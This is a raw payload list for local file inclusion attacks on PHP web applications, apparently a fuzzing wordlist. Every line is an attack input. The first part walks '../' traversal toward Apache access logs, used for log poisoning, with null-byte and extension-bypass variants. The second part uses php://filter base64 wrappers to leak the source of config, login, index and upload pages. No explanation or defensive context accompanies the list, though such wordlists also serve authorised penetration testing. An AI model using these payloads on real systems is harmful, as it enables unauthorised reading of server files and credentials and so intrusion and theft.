/var/log/apache2/access.log
/var/log/httpd/access.log
/var/log/apache/access.log%00
/var/log/apache2/access.log%00
/var/log/httpd/access.log%00
/var/log/apache/access.log%00.
/var/log/apache2/access.log%00.
/var/log/httpd/access.log%00.
/var/log/apache/access.log.html
/var/log/apache2/access.log.html
/var/log/httpd/access.log.html
/var/log/apache/access.log\0.php
/var/log/apache2/access.log\0.php
/var/log/httpd/access.log\0.php
../var/log/apache/access.log
../var/log/apache2/access.log
../var/log/httpd/access.log
../var/log/apache/access.log%00
../var/log/apache2/access.log%00
../var/log/httpd/access.log%00
../var/log/apache/access.log%00.
../var/log/apache2/access.log%00.
../var/log/httpd/access.log%00.
../var/log/apache/access.log.html
../var/log/apache2/access.log.html
../var/log/httpd/access.log.html
../var/log/apache/access.log\0.php
../var/log/apache2/access.log\0.php
../var/log/httpd/access.log\0.php
../../var/log/apache/access.log
../../var/log/apache2/access.log
../../var/log/httpd/access.log
../../var/log/apache/access.log%00
../../var/log/apache2/access.log%00
../../var/log/httpd/access.log%00
../../var/log/apache/access.log%00.
../../var/log/apache2/access.log%00.
../../var/log/httpd/access.log%00.
../../var/log/apache/access.log.html
../../var/log/apache2/access.log.html
../../var/log/httpd/access.log.html
../../var/log/apache/access.log\0.php
../../var/log/apache2/access.log\0.php
../../var/log/httpd/access.log\0.php
../../../var/log/apache/access.log
../../../var/log/apache2/access.log
../../../var/log/httpd/access.log
../../../var/log/apache/access.log%00
../../../var/log/apache2/access.log%00
../../../var/log/httpd/access.log%00
../../../var/log/apache/access.log%00.
../../../var/log/apache2/access.log%00.
../../../var/log/httpd/access.log%00.
../../../var/log/apache/access.log.html
../../../var/log/apache2/access.log.html
../../../var/log/httpd/access.log.html
../../../var/log/apache/access.log\0.php
../../../var/log/apache2/access.log\0.php
../../../var/log/httpd/access.log\0.php
php://filter/convert.base64-encode/resource=upload
php://filter/convert.base64-encode/resource=login
php://filter/convert.base64-encode/resource=index
php://filter/convert.base64-encode/resource=config
php://filter/convert.base64-encode/resource=upload%00
php://filter/convert.base64-encode/resource=login%00
php://filter/convert.base64-encode/resource=index%00
php://filter/convert.base64-encode/resource=config%00
php://filter/convert.base64-encode/resource=upload%00.
php://filter/convert.base64-encode/resource=login%00.
php://filter/convert.base64-encode/resource=index%00.
php://filter/convert.base64-encode/resource=config%00.
php://filter/convert.base64-encode/resource=upload.html
php://filter/convert.base64-encode/resource=login.html
php://filter/convert.base64-encode/resource=index.html
php://filter/convert.base64-encode/resource=config.html
php://filter/convert.base64-encode/resource=upload\0.php
php://filter/convert.base64-encode/resource=login\0.php
php://filter/convert.base64-encode/resource=index\0.php
php://filter/convert.base64-encode/resource=config\0.php
php://filter/convert.base64-encode/pg=upload
php://filter/convert.base64-encode/pg=login
php://filter/convert.base64-encode/pg=index
php://filter/convert.base64-encode/pg=config
php://filter/convert.base64-encode/pg=upload%00
php://filter/convert.base64-encode/pg=login%00
php://filter/convert.base64-encode/pg=index%00
php://filter/convert.base64-encode/pg=config%00
php://filter/convert.base64-encode/pg=upload%00.
php://filter/convert.base64-encode/pg=login%00.
php://filter/convert.base64-encode/pg=index%00.
php://filter/convert.base64-encode/pg=config%00.
php://filter/convert.base64-encode/pg=upload.html
php://filter/convert.base64-encode/pg=login.html
php://filter/convert.base64-encode/pg=index.html
php://filter/convert.base64-encode/pg=config.html
php://filter/convert.base64-encode/pg=upload\0.php
php://filter/convert.base64-encode/pg=login\0.php
php://filter/convert.base64-encode/pg=index\0.php
php://filter/convert.base64-encode/pg=config\0.php
